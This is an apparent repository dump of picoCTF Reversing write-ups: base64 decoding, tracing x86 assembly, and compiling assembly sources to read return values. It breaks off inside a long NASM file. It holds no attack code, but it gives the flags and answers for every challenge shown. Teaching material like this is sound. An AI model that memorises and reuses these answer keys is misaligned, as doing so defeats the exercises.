    "content": "# Radix's Terminal \nPoints: 400\n\n## Category\nReversing\n\n## Question\n>Can you find the password to Radix's login? You can also find the executable in /problems/radix-s-terminal_0_b6b476e9952f39511155a2e64fb75248?\n\n### Hint\n>https://en.wikipedia.org/wiki/Base64\n\n## Solution\nBased off the hint, we can assume the flag is being encoded in base64 just by doing _strings_\n\n```\ncGljb0NURntiQXNFXzY0X2VOQ29EaU5nX2lTX0VBc1lfNDE3OTk0NTF9\nPlease provide a password!\nCongrats, now where's my flag?\nIncorrect Password!\n;*2$\"\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\nGCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609\n\n```\nputting the string cGljb0NURntiQXNFXzY0X2VOQ29EaU5nX2lTX0VBc1lfNDE3OTk0NTF9 in a base 64 decode will return us the flag\n\n\n### Flag\n`picoCTF{bAsE_64_eNCoDiNg_iS_EAsY_41799451}`\n"
  },
  {
    "path": "Reversing/Reversing Warmup 1/README.md",
    "content": "# Reversing Warmup 1\nPoints: 50\n\n## Category\nReversing\n\n## Question\n>Throughout your journey you will have to run many programs. Can you navigate to /problems/reversing-warmup-1_1_b416a2d0694c871d8728d8268d84ac5c on the shell server and run this [program](files/run) to retreive the flag? \n\n### Hint\n>If you are searching online, it might be worth finding how to exeucte a program in command line.\n\n## Solution\nDownload the file and make it executable if needed to `chmod +x run`\n\nRun the file by doing `./run`\n\n### Flag\n`picoCTF{welc0m3_t0_r3VeRs1nG}`\n"
  },
  {
    "path": "Reversing/Reversing Warmup 2/README.md",
    "content": "# Reversing Warmup 2\nPoints: 50\n\n## Category\nReversing\n\n## Question\n>Can you decode the following string `dGg0dF93NHNfczFtcEwz` from base64 format to ASCII? \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{hello}' as the flag.\n\n## Solution\n```python\n>>> print 'dGg0dF93NHNfczFtcEwz'.decode('base64')\nth4t_w4s_s1mpL3\n```\n\n### Flag\n`picoCTF{th4t_w4s_s1mpL3}`\n"
  },
  {
    "path": "Reversing/assembly-0/README.md",
    "content": "# assembly-0\nPoints: 150\n\n## Category\nReversing\n\n## Question\n>What does asm0(0xc9,0xb0) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/intro_asm_rev.S) located in the directory at /problems/assembly-0_4_0f197369bfc00a9211504cf65ac31994. \n\n### Hint\n>basic assembly [tutorial](https://www.tutorialspoint.com/assembly_programming/assembly_basic_syntax.htm)\n>\n>assembly [registers](https://www.tutorialspoint.com/assembly_programming/assembly_registers.htm)\n\n## Solution\nIn x86 assembly, the return value is passed in _eax_.\n\n```asm\nasm0:\n\tpush\tebp\n\tmov\tebp,esp\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tmov\tebx,DWORD PTR [ebp+0xc]\n\tmov\teax,ebx\n\tmov\tesp,ebp\n\tpop\tebp\t\n\tret\n```\n\nAfter the two loads, _eax_ holds _0xc9_ and _ebx_ holds _0xb0_. `mov eax,ebx` then overwrites _eax_ with the value of _ebx_, so the returned value is _0xb0_.\n\n### Flag\n`0xb0`\n"
  },
  {
    "path": "Reversing/assembly-0/files/intro_asm_rev.S",
    "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm0\n\nasm0:\n\tpush\tebp\n\tmov\tebp,esp\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tmov\tebx,DWORD PTR [ebp+0xc]\n\tmov\teax,ebx\n\tmov\tesp,ebp\n\tpop\tebp\t\n\tret\n"
  },
  {
    "path": "Reversing/assembly-1/README.md",
    "content": "# assembly-1\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>What does asm1(0x76) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/eq_asm_rev.S) located in the directory at /problems/assembly-1_0_cfb59ef3b257335ee403035a6e42c2ed. \n\n### Hint\n>assembly [conditions](https://www.tutorialspoint.com/assembly_programming/assembly_conditions.htm)\n\n## Solution\nTrace the branches with the argument _0x76_: it is not greater than _0x98_, so `jg part_a` is not taken; it is not equal to _0x8_, so `jne part_b` is taken. `part_b` loads the argument into _eax_ and subtracts _0x3_, so _0x73_ is returned.\n\n### Flag\n`0x73`\n"
  },
  {
    "path": "Reversing/assembly-1/files/eq_asm_rev.S",
    "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm1\n\nasm1:\n\tpush\tebp\n\tmov\tebp,esp\n\tcmp\tDWORD PTR [ebp+0x8],0x98\n\tjg \tpart_a\t\n\tcmp\tDWORD PTR [ebp+0x8],0x8\n\tjne\tpart_b\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tadd\teax,0x3\n\tjmp\tpart_d\npart_a:\n\tcmp\tDWORD PTR [ebp+0x8],0x16\n\tjne\tpart_c\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tsub\teax,0x3\n\tjmp\tpart_d\npart_b:\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tsub\teax,0x3\n\tjmp\tpart_d\n\tcmp\tDWORD PTR [ebp+0x8],0xbc\n\tjne\tpart_c\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tsub\teax,0x3\n\tjmp\tpart_d\npart_c:\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tadd\teax,0x3\npart_d:\n\tpop\tebp\n\tret\n"
  },
  {
    "path": "Reversing/assembly-2/README.md",
    "content": "# assembly-2\nPoints: 250\n\n## Category\nReversing\n\n## Question\n>What does asm2(0x7,0x28) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/loop_asm_rev.S) located in the directory at /problems/assembly-2_4_f8bfecf223768f4cac035751390ea590. \n\n### Hint\n>assembly [conditions](https://www.tutorialspoint.com/assembly_programming/assembly_conditions.htm)\n\n## Solution\nCompile the asm together with another function that calls the _asm2_ function and prints it out\n\n```asm\n[0x000011f4]> pdf\n/ (fcn) loc.asm2 44\n|   loc.asm2 (int arg_8h, int arg_ch);\n|           ; var int local_8h @ ebp-0x8\n|           ; var int local_4h @ ebp-0x4\n|           ; arg int arg_8h @ ebp+0x8\n|           ; arg int arg_ch @ ebp+0xc\n|           ; CALL XREF from sym.main (0x11ca)\n|           0x000011f4      55             push ebp\n|           0x000011f5      89e5           mov ebp, esp\n|           0x000011f7      83ec10         sub esp, 0x10\n|           0x000011fa      8b450c         mov eax, dword [arg_ch]     ; [0xc:4]=0\n|           0x000011fd      8945fc         mov dword [local_4h], eax\n|           0x00001200      8b4508         mov eax, dword [arg_8h]     ; [0x8:4]=0\n|           0x00001203      8945f8         mov dword [local_8h], eax\n|       ,=< 0x00001206      eb08           jmp loc.part_b\n|       |   ;-- part_a:\n|      .--> 0x00001208      8345fc01       add dword [local_4h], 1\n|      :|   0x0000120c      83450876       add dword [arg_8h], 0x76    ; 'v'\n|      :|   ;-- part_b:\n|      :|   ; CODE XREF from loc.asm2 (0x1206)\n|      :`-> 0x00001210      817d08dea100.  
cmp dword [arg_8h], 0xa1de  ; [0xa1de:4]=-1\n|      `==< 0x00001217      7eef           jle loc.part_a\n|           0x00001219      8b45fc         mov eax, dword [local_4h]\n|           0x0000121c      89ec           mov esp, ebp\n|           0x0000121e      5d             pop ebp\n\\           0x0000121f      c3             ret\n```\n\n```\n$ make all\ngcc -m32 -c loop.s -o loop.o\ngcc -m32 -c solve.c -o solve.o\nsolve.c: In function ‘main’:\nsolve.c:4:28: warning: implicit declaration of function ‘asm2’ [-Wimplicit-function-declaration]\n     printf(\"Flag: 0x%x\\n\", asm2(0x7, 0x28));\n                            ^~~~\ngcc -m32 -o a.out solve.o loop.o\n./a.out\nFlag: 0x188\n```\n\nWorking solution [solve.sh](solution/solve.sh)\n\nThanks to [@LFlare](https://github.com/LFlare) for basically solving this.\n\n### Flag\n`0x188`\n"
  },
  {
    "path": "Reversing/assembly-2/files/loop_asm_rev.S",
    "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm2\n\nasm2:\n\tpush   \tebp\n\tmov    \tebp,esp\n\tsub    \tesp,0x10\n\tmov    \teax,DWORD PTR [ebp+0xc]\n\tmov \tDWORD PTR [ebp-0x4],eax\n\tmov    \teax,DWORD PTR [ebp+0x8]\n\tmov\tDWORD PTR [ebp-0x8],eax\n\tjmp    \tpart_b\npart_a:\t\n\tadd    \tDWORD PTR [ebp-0x4],0x1\n\tadd\tDWORD PTR [ebp+0x8],0x76\npart_b:\t\n\tcmp    \tDWORD PTR [ebp+0x8],0xa1de\n\tjle    \tpart_a\n\tmov    \teax,DWORD PTR [ebp-0x4]\n\tmov\tesp,ebp\n\tpop\tebp\n\tret\n"
  },
  {
    "path": "Reversing/assembly-2/solution/Makefile",
    "content": "all:\n\tgcc -m32 -c loop.s -o loop.o\n\tgcc -m32 -c solve.c -o solve.o\n\tgcc -m32 -o a.out solve.o loop.o\n\t./a.out\nclean:\n\trm a.out *.o\n"
  },
  {
    "path": "Reversing/assembly-2/solution/loop.s",
    "content": ".intel_syntax noprefix\n\t\n.global asm2\n\nasm2:\n\tpush   \tebp\n\tmov    \tebp,esp\n\tsub    \tesp,0x10\n\tmov    \teax,DWORD PTR [ebp+0xc]\n\tmov \tDWORD PTR [ebp-0x4],eax\n\tmov    \teax,DWORD PTR [ebp+0x8]\n\tmov\tDWORD PTR [ebp-0x8],eax\n\tjmp    \tpart_b\npart_a:\t\n\tadd    \tDWORD PTR [ebp-0x4],0x1\n\tadd\tDWORD PTR [ebp+0x8],0x76\npart_b:\t\n\tcmp    \tDWORD PTR [ebp+0x8],0xa1de\n\tjle    \tpart_a\n\tmov    \teax,DWORD PTR [ebp-0x4]\n\tmov\tesp,ebp\n\tpop\tebp\n\tret\n"
  },
  {
    "path": "Reversing/assembly-2/solution/solve.c",
    "content": "#include <stdio.h>\n\nint main() {\n    printf(\"Flag: 0x%x\\n\", asm2(0x7, 0x28));\n}\n"
  },
  {
    "path": "Reversing/assembly-2/solution/solve.sh",
    "content": "#!/bin/sh\nmake all\n"
  },
  {
    "path": "Reversing/assembly-3/README.md",
    "content": "# assembly-3\nPoints: 400\n\n## Category\nReversing\n\n## Question\n>What does asm3(0xbda42100,0xb98dd6a5,0xecded223) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/end_asm_rev.S) located in the directory at /problems/assembly-3_4_05ce5be4420bf9bd2ff37caf87e32898. \n\n### Hint\n>more(?) [registers](https://wiki.skullsecurity.org/index.php?title=Registers)\n\n## Solution\nCompile the asm together with another function that calls the _asm3_ function and prints it out\n\n```asm\n/ (fcn) loc.asm3 31\n|   loc.asm3 (int arg_9h, int arg_ch, int arg_dh, int arg_10h);\n|           ; arg int arg_9h @ ebp+0x9\n|           ; arg int arg_ch @ ebp+0xc\n|           ; arg int arg_dh @ ebp+0xd\n|           ; arg int arg_10h @ ebp+0x10\n|           ; CALL XREF from sym.main (0x11d5)\n|           0x000011ff      55             push ebp\n|           0x00001200      89e5           mov ebp, esp\n|           0x00001202      b8bc000000     mov eax, 0xbc\n|           0x00001207      30c0           xor al, al\n|           0x00001209      8a6509         mov ah, byte [arg_9h]       ; [0x9:1]=0\n|           0x0000120c      66c1e010       shl ax, 0x10\n|           0x00001210      2a450c         sub al, byte [arg_ch]\n|           0x00001213      02650d         add ah, byte [arg_dh]\n|           0x00001216      66334510       xor ax, word [arg_10h]\n|           0x0000121a      89ec           mov esp, ebp\n|           0x0000121c      5d             pop ebp\n\\           0x0000121d      c3             ret\n\n```\n\n```\n$ make all\ngcc -m32 -c end.s -o end.o\ngcc -m32 -c solve.c -o solve.o\nsolve.c: In function ‘main’:\nsolve.c:4:28: warning: implicit declaration of function ‘asm3’ [-Wimplicit-function-declaration]\n     printf(\"Flag: 0x%x\\n\", asm3(0xbda42100, 0xb98dd6a5, 0xecded223));\n                            ^~~~\ngcc -m32 -o a.out solve.o 
end.o\n./a.out\nFlag: 0x478\n```\n\n### Flag\n`0x478`\n"
  },
  {
    "path": "Reversing/assembly-3/files/end_asm_rev.S",
    "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm3\n\nasm3:\n\tpush   \tebp\n\tmov    \tebp,esp\n\tmov\teax,0xbc\n\txor\tal,al\n\tmov\tah,BYTE PTR [ebp+0x9]\n\tsal\tax,0x10\n\tsub\tal,BYTE PTR [ebp+0xc]\n\tadd\tah,BYTE PTR [ebp+0xd]\n\txor\tax,WORD PTR [ebp+0x10]\n\tmov\tesp, ebp\n\tpop\tebp\n\tret\n"
  },
  {
    "path": "Reversing/assembly-3/solution/Makefile",
    "content": "all:\n\tgcc -m32 -c end.s -o end.o\n\tgcc -m32 -c solve.c -o solve.o\n\tgcc -m32 -o a.out solve.o end.o\n\t./a.out\nclean:\n\trm a.out *.o\n"
  },
  {
    "path": "Reversing/assembly-3/solution/end.s",
    "content": ".intel_syntax noprefix\n\t\n.global asm3\n\nasm3:\n\tpush   \tebp\n\tmov    \tebp,esp\n\tmov\teax,0xbc\n\txor\tal,al\n\tmov\tah,BYTE PTR [ebp+0x9]\n\tsal\tax,0x10\n\tsub\tal,BYTE PTR [ebp+0xc]\n\tadd\tah,BYTE PTR [ebp+0xd]\n\txor\tax,WORD PTR [ebp+0x10]\n\tmov\tesp, ebp\n\tpop\tebp\n\tret\n"
  },
  {
    "path": "Reversing/assembly-3/solution/solve.c",
    "content": "#include <stdio.h>\n\nint main() {\n    printf(\"Flag: 0x%x\\n\", asm3(0xbda42100, 0xb98dd6a5, 0xecded223));\n}\n"
  },
  {
    "path": "Reversing/assembly-3/solution/solve.sh",
    "content": "#!/bin/sh\nmake all\n"
  },
  {
    "path": "Reversing/assembly-4/README.md",
    "content": "# assembly-4\nPoints: 550\n\n## Category\nReversing\n\n## Question\n>Can you find the flag using the following assembly [source](files/comp.nasm)? WARNING: It is VERY long... \n\n### Hint\n>Hmm.. There must be an easier way than reversing the whole thing right?\n\n## Solution\nCompile the code using _nasm_ and _gcc_, then run the executable to get the flag.\n\nNote: The flag it prints is `picoCTF{1_h0p3_70u_c0mP1l3d_tH15_2390040222}`, but this doesn't work on the server. Refer to https://piazza.com/class/jkimphnvxey1qo?cid=65 to get the real flag.\n\nWorking solution [solve.sh](solution/solve.sh)\n\n### Flag\n`picoCTF{1_h0p3_y0u_c0mP1l3d_tH15_2350040222}`\n"
  },
  {
    "path": "Reversing/assembly-4/files/Makefile",
    "content": "all:\n\tnasm -f elf32 comp.nasm\n\tgcc -m32 comp.o\n\t./a.out\nclean:\n\trm a.out comp.o\n"
  },
  {
    "path": "Reversing/assembly-4/files/comp.nasm",
    "content": "\n\n\n\n\n\n\nglobal rrf0\nglobal rrf1\nglobal rrf2\nglobal rrf3\nglobal rrf4\nglobal rrf5\nglobal rrf6\nglobal rrf7\nglobal rrf8\nglobal rrf9\nglobal rrfcl\nglobal rrfscl\nglobal rrflt\nglobal rrfeq\nglobal rrfgt\nglobal rrfqm\nglobal rrfat\nglobal rrfA\nglobal rrfB\nglobal rrfC\nglobal rrfD\nglobal rrfE\nglobal rrfF\nglobal rrfG\nglobal rrfH\nglobal rrfI\nglobal rrfJ\nglobal rrfK\nglobal rrfL\nglobal rrfM\nglobal rrfN\nglobal rrfO\nglobal rrfP\nglobal rrfQ\nglobal rrfR\nglobal rrfS\nglobal rrfT\nglobal rrfU\nglobal rrfV\nglobal rrfW\nglobal rrfX\nglobal rrfY\nglobal rrfZ\nglobal rrflb\nglobal rrfbs\nglobal rrfrb\nglobal rrfct\nglobal rrfus\nglobal rrftl\nglobal rrfa\nglobal rrfb\nglobal rrfc\nglobal rrfd\nglobal rrfe\nglobal rrff\nglobal rrfg\nglobal rrfh\nglobal rrfi\nglobal rrfj\nglobal rrfk\nglobal rrfl\nglobal rrfm\nglobal rrfn\nglobal rrfo\nglobal rrfp\nglobal rrfq\nglobal rrfr\nglobal rrfs\nglobal rrft\nglobal rrfu\nglobal rrfv\nglobal rrfw\nglobal rrfx\nglobal rrfy\nglobal rrfz\nglobal rrflcb\nglobal rrfst\nglobal rrfrcb\nglobal rrf00\nglobal add\nglobal sub\nglobal xor\nglobal main\n\nextern write\n\n\nSECTION .text   \n\nrrf0:\n        mov     eax, 48\n        ret\n\n\nrrf1:\n        mov     eax, 49\n        ret\n\n\nrrf2:\n        mov     eax, 50\n        ret\n\n\nrrf3:\n        mov     eax, 51\n        ret\n\n\nrrf4:\n        mov     eax, 52\n        ret\n\n\nrrf5:\n        mov     eax, 53\n        ret\n\n\nrrf6:\n        mov     eax, 54\n        ret\n\n\nrrf7:\n        mov     eax, 55\n        ret\n\n\nrrf8:\n        mov     eax, 56\n        ret\n\n\nrrf9:\n        mov     eax, 57\n        ret\n\n\nrrfcl:\n        mov     eax, 58\n        ret\n\n\nrrfscl:\n        mov     eax, 59\n        ret\n\n\nrrflt:\n        mov     eax, 60\n        ret\n\n\nrrfeq:\n        mov     eax, 61\n        ret\n\n\nrrfgt:\n        mov     eax, 62\n        ret\n\n\nrrfqm:\n        mov     eax, 63\n        ret\n\n\nrrfat:\n        mov     eax, 64\n        
ret\n\n\nrrfA:\n        mov     eax, 65\n        ret\n\n\nrrfB:\n        mov     eax, 66\n        ret\n\n\nrrfC:\n        mov     eax, 67\n        ret\n\n\nrrfD:\n        mov     eax, 68\n        ret\n\n\nrrfE:\n        mov     eax, 69\n        ret\n\n\nrrfF:\n        mov     eax, 70\n        ret\n\n\nrrfG:\n        mov     eax, 71\n        ret\n\n\nrrfH:\n        mov     eax, 72\n        ret\n\n\nrrfI:\n        mov     eax, 73\n        ret\n\n\nrrfJ:\n        mov     eax, 74\n        ret\n\n\nrrfK:\n        mov     eax, 75\n        ret\n\n\nrrfL:\n        mov     eax, 76\n        ret\n\n\nrrfM:\n        mov     eax, 77\n        ret\n\n\nrrfN:\n        mov     eax, 78\n        ret\n\n\nrrfO:\n        mov     eax, 79\n        ret\n\n\nrrfP:\n        mov     eax, 80\n        ret\n\n\nrrfQ:\n        mov     eax, 81\n        ret\n\n\nrrfR:\n        mov     eax, 82\n        ret\n\n\nrrfS:\n        mov     eax, 83\n        ret\n\n\nrrfT:\n        mov     eax, 84\n        ret\n\n\nrrfU:\n        mov     eax, 85\n        ret\n\n\nrrfV:\n        mov     eax, 86\n        ret\n\n\nrrfW:\n        mov     eax, 87\n        ret\n\n\nrrfX:\n        mov     eax, 88\n        ret\n\n\nrrfY:\n        mov     eax, 89\n        ret\n\n\nrrfZ:\n        mov     eax, 90\n        ret\n\n\nrrflb:\n        mov     eax, 91\n        ret\n\n\nrrfbs:\n        mov     eax, 92\n        ret\n\n\nrrfrb:\n        mov     eax, 93\n        ret\n\n\nrrfct:\n        mov     eax, 94\n        ret\n\n\nrrfus:\n        mov     eax, 95\n        ret\n\n\nrrftl:\n        mov     eax, 96\n        ret\n\n\nrrfa:\n        mov     eax, 97\n        ret\n\n\nrrfb:\n        mov     eax, 98\n        ret\n\n\nrrfc:\n        mov     eax, 99\n        ret\n\n\nrrfd:\n        mov     eax, 100\n        ret\n\n\nrrfe:\n        mov     eax, 101\n        ret\n\n\nrrff:\n        mov     eax, 102\n        ret\n\n\nrrfg:\n        mov     eax, 103\n        ret\n\n\nrrfh:\n        mov     eax, 104\n        ret\n\n\nrrfi:\n        mov  
   eax, 105\n        ret\n\n\nrrfj:\n        mov     eax, 106\n        ret\n\n\nrrfk:\n        mov     eax, 107\n        ret\n\n\nrrfl:\n        mov     eax, 108\n        ret\n\n\nrrfm:\n        mov     eax, 109\n        ret\n\n\nrrfn:\n        mov     eax, 110\n        ret\n\n\nrrfo:\n        mov     eax, 111\n        ret\n\n\nrrfp:\n        mov     eax, 112\n        ret\n\n\nrrfq:\n        mov     eax, 113\n        ret\n\n\nrrfr:\n        mov     eax, 114\n        ret\n\n\nrrfs:\n        mov     eax, 115\n        ret\n\n\nrrft:\n        mov     eax, 116\n        ret\n\n\nrrfu:\n        mov     eax, 117\n        ret\n\n\nrrfv:\n        mov     eax, 118\n        ret\n\n\nrrfw:\n        mov     eax, 119\n        ret\n\n\nrrfx:\n        mov     eax, 120\n        ret\n\n\nrrfy:\n        mov     eax, 121\n        ret\n\n\nrrfz:\n        mov     eax, 122\n        ret\n\n\nrrflcb:\n        mov     eax, 123\n        ret\n\n\nrrfst:\n        mov     eax, 124\n        ret\n\n\nrrfrcb:\n        mov     eax, 125\n        ret\n\n\nrrf00:\n        mov     eax, 0\n        ret\n\n\nadd:\n        movsx   ecx, byte [esp+4H]\n        sub     ecx, 48\n        add     ecx, dword [esp+8H]\n        mov     edx, 3524075731\n        mov     eax, ecx\n        imul    edx\n        add     edx, ecx\n        sar     edx, 6\n        mov     eax, ecx\n        sar     eax, 31\n        sub     edx, eax\n        imul    edx, edx, 78\n        sub     ecx, edx\n        lea     eax, [ecx+30H]\n        ret\n\n\nsub:\n        movsx   ecx, byte [esp+4H]\n        sub     ecx, 48\n        sub     ecx, dword [esp+8H]\n        mov     edx, 3524075731\n        mov     eax, ecx\n        imul    edx\n        add     edx, ecx\n        sar     edx, 6\n        mov     eax, ecx\n        sar     eax, 31\n        sub     edx, eax\n        imul    edx, edx, 78\n        sub     ecx, edx\n        mov     edx, ecx\n        lea     ecx, [ecx+7EH]\n        lea     eax, [edx+30H]\n        test    edx, edx\n        cmovs   
eax, ecx\n        ret\n\n\nxor:\n        movsx   ecx, byte [esp+4H]\n        sub     ecx, 48\n        mov     eax, dword [esp+8H]\n        and     eax, 07H\n        xor     ecx, eax\n        mov     edx, 3524075731\n        mov     eax, ecx\n        imul    edx\n        add     edx, ecx\n        sar     edx, 6\n        mov     eax, ecx\n        sar     eax, 31\n        sub     edx, eax\n        imul    edx, edx, 78\n        sub     ecx, edx\n        lea     eax, [ecx+30H]\n        ret\n\n\nmain:\n        lea     ecx, [esp+4H]\n        and     esp, 0FFFFFFF0H\n        push    dword [ecx-4H]\n        push    ebp\n        mov     ebp, esp\n        push    esi\n        push    ebx\n        push    ecx\n        sub     esp, 60\n        push    39\n        push    73\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-44H], al\n        push    48\n        push    99\n        call    sub\n        add     esp, 8\n        push    24\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-42H], al\n        push    44\n        push    68\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 05H\n        mov     ebx, 3524075731\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-40H], cl\n        push    41\n        push    121\n        call    sub\n        add     esp, 8\n        push    47\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, 
edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-3EH], cl\n        push    31\n        push    54\n        call    sub\n        add     esp, 8\n        push    34\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-3CH], al\n        push    54\n        push    55\n        call    sub\n        add     esp, 8\n        push    49\n        movsx   ecx, al\n        add     ecx, 6\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        lea     eax, [ecx+30H]\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-3AH], al\n        push    40\n        push    108\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 02H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-38H], cl\n        mov     byte [ebp-36H], 123\n        push    50\n        push    99\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-34H], al\n        mov     byte [ebp-32H], 95\n        push    32\n        push    102\n        call    sub\n        add     esp, 8\n        push    22\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        add     ecx, 8\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    
eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-30H], cl\n        push    20\n        push    107\n        call    sub\n        add     esp, 8\n        push    39\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-2EH], al\n        push    46\n        push    80\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-2CH], al\n        push    27\n        push    78\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-2AH], al\n        push    28\n        push    123\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-28H], al\n        mov     byte [ebp-26H], 55\n        push    36\n        push    84\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-24H], al\n        push    33\n        push    107\n        call    sub\n        add     esp, 8\n        push    39\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 04H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        lea     eax, [ecx+30H]\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-22H], al\n        push    49\n        push    66\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-20H], al\n        mov     byte [ebp-1EH], 99\n        push    36\n        push    57\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 07H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add   
  ecx, 48\n        movsx   ecx, cl\n        sub     ecx, 22\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-1CH], cl\n        mov     byte [ebp-1AH], 109\n        mov     byte [ebp-43H], 80\n        push    18\n        push    67\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-41H], al\n        push    32\n        push    112\n        call    sub\n        add     esp, 8\n        push    25\n        movsx   eax, al\n        lea     ecx, [eax+5H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-3FH], al\n        push    37\n        push    109\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 06H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        movsx   ecx, cl\n        add     ecx, 3\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-3DH], cl\n        push    31\n        push    49\n        call    sub\n        add     esp, 8\n        movsx   
ecx, al\n        sub     ecx, 48\n        xor     ecx, 04H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-3BH], cl\n        push    23\n        push    118\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-39H], al\n        push    43\n        push    81\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-37H], al\n        push    34\n        push    61\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 03H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        movsx   ecx, cl\n        sub     ecx, 4\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-35H], cl\n        push    51\n        push    100\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-33H], al\n        push    27\n        push    80\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-31H], al\n        mov     byte [ebp-2FH], 95\n        push    40\n        push    110\n        call    sub\n        add     